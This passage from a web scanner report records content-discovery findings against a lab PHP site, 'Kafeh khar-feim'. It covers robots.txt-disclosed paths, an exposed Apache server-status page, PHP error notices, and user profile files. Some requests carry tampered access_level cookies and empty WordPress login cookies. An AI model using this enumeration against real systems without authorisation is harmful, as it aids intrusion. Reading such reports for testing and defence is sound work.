User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:48:28 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 190
Connection: close
Content-Type: text/plain;charset=UTF-8

User-agent: *
Disallow: /user/
Disallow: /search
Disallow: /config.php
Disallow: /phpinfo.php
Disallow: /session.php
Disallow: /sys-test.php
Disallow: /sys2_test.php
Disallow: /server-status
3.10.12. http://10.250.200.5:81/search
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /search

Request 1

GET /search HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:48:29 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 996
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 style="text-align: center;">
           <span style="font-family:tahoma,geneva,sans-
...[SNIP]...
3.10.13. http://10.250.200.5:81/search/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /search/

Request 1

GET /search/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:49:07 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 996
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 style="text-align: center;">
           <span style="font-family:tahoma,geneva,sans-
...[SNIP]...
3.10.14. http://10.250.200.5:81/search/search
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /search/search

Request 1

GET /search/search HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

Response 1

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:49:07 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 996
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 style="text-align: center;">
           <span style="font-family:tahoma,geneva,sans-
...[SNIP]...
3.10.15. http://10.250.200.5:81/server-status
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /server-status

Request 1

GET /server-status HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:51:37 GMT
Server: Apache/2.4.10 (Debian)
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 7411
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for 10.250.200.5 (via 172.18.0.6)</h1>

<dl><dt>Server Version:
...[SNIP]...
3.10.16. http://10.250.200.5:81/server-status/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /server-status/

Request 1

GET /server-status/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:02 GMT
Server: Apache/2.4.10 (Debian)
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 7404
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for 10.250.200.5 (via 172.18.0.6)</h1>

<dl><dt>Server Version:
...[SNIP]...
3.10.17. http://10.250.200.5:81/session.php
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /session.php

Request 1

GET /session.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:05 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 13
Connection: close
Content-Type: text/html; charset=UTF-8

array(0) {
}
3.10.18. http://10.250.200.5:81/session.php/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /session.php/

Request 1

GET /session.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:10 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 13
Connection: close
Content-Type: text/html; charset=UTF-8

array(0) {
}
3.10.19. http://10.250.200.5:81/sys-test.php
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /sys-test.php

Request 1

GET /sys-test.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:15 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 110
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Notice</b>: Undefined index: test in <b>/var/www/html/sys-test.php</b> on line <b>2</b><br />
</br>
3.10.20. http://10.250.200.5:81/sys-test.php/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /sys-test.php/

Request 1

GET /sys-test.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:25 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 110
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Notice</b>: Undefined index: test in <b>/var/www/html/sys-test.php</b> on line <b>2</b><br />
</br>
3.10.21. http://10.250.200.5:81/sys2_test.php
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /sys2_test.php

Request 1

GET /sys2_test.php HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:13 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 7020
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
3.10.22. http://10.250.200.5:81/sys2_test.php/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /sys2_test.php/

Request 1

GET /sys2_test.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:17 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 7020
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html pmbx_context="68E2E7E7-626F-494D-87D5-63024AC0F832">

<head>
<title>Kafeh khar-feim</title>
<style type="text/css">
div.absolute {
position: absolute;
...[SNIP]...
3.10.23. http://10.250.200.5:81/user/jyoti.ermine
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine

Request 1

GET /user/jyoti.ermine HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:56:10 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1345
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>jyoti.ermine -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<lin
...[SNIP]...
3.10.24. http://10.250.200.5:81/user/jyoti.ermine/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine/

Request 1

GET /user/jyoti.ermine/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:17 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1345
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>jyoti.ermine -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<lin
...[SNIP]...
3.10.25. http://10.250.200.5:81/user/jyoti.ermine/key.asc
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine/key.asc

Request 1

GET /user/jyoti.ermine/key.asc HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:55:25 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 50
Connection: close
Content-Type: text/html; charset=UTF-8

gpgkeys: key FA46950C not found on keyserver<br/>
3.10.26. http://10.250.200.5:81/user/jyoti.ermine/me.jpg
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/jyoti.ermine/me.jpg

Request 1

GET /user/jyoti.ermine/me.jpg HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:42:44 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 0
Connection: close
Content-Type: image/jpeg

3.10.27. http://10.250.200.5:81/user/marge.aphrodite
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite

Request 1

GET /user/marge.aphrodite HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:06:43 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1364
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>marge.aphrodite -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<
...[SNIP]...
3.10.28. http://10.250.200.5:81/user/marge.aphrodite/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite/

Request 1

GET /user/marge.aphrodite/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:56:17 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1364
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>marge.aphrodite -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<
...[SNIP]...
3.10.29. http://10.250.200.5:81/user/marge.aphrodite/key.asc
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite/key.asc

Request 1

GET /user/marge.aphrodite/key.asc HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:56:28 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 50
Connection: close
Content-Type: text/html; charset=UTF-8

gpgkeys: key 958179F2 not found on keyserver<br/>
3.10.30. http://10.250.200.5:81/user/marge.aphrodite/me.jpg
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/marge.aphrodite/me.jpg

Request 1

GET /user/marge.aphrodite/me.jpg HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:42:44 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 0
Connection: close
Content-Type: image/jpeg

3.10.31. http://10.250.200.5:81/user/rica.orpah
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah

Request 1

GET /user/rica.orpah HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:14:38 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1334
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>rica.orpah -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link
...[SNIP]...
3.10.32. http://10.250.200.5:81/user/rica.orpah/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah/

Request 1

GET /user/rica.orpah/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:17:20 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 1334
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">

<head>
<title>rica.orpah -- Kafeh khar-feim</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link
...[SNIP]...
3.10.33. http://10.250.200.5:81/user/rica.orpah/key.asc
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah/key.asc

Request 1

GET /user/rica.orpah/key.asc HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 12:17:21 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 50
Connection: close
Content-Type: text/html; charset=UTF-8

gpgkeys: key 94853B61 not found on keyserver<br/>
3.10.34. http://10.250.200.5:81/user/rica.orpah/me.jpg
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/rica.orpah/me.jpg

Request 1

GET /user/rica.orpah/me.jpg HTTP/1.1
Host: 10.250.200.5:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.250.200.5:81/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=1
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:42:44 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 0
Connection: close
Content-Type: image/jpeg

3.10.35. http://10.250.200.5:81/user/ricca.gilud
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5:81
Path:   /user/ricca.gilud

Request 1

GET /user/ricca.gilud HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
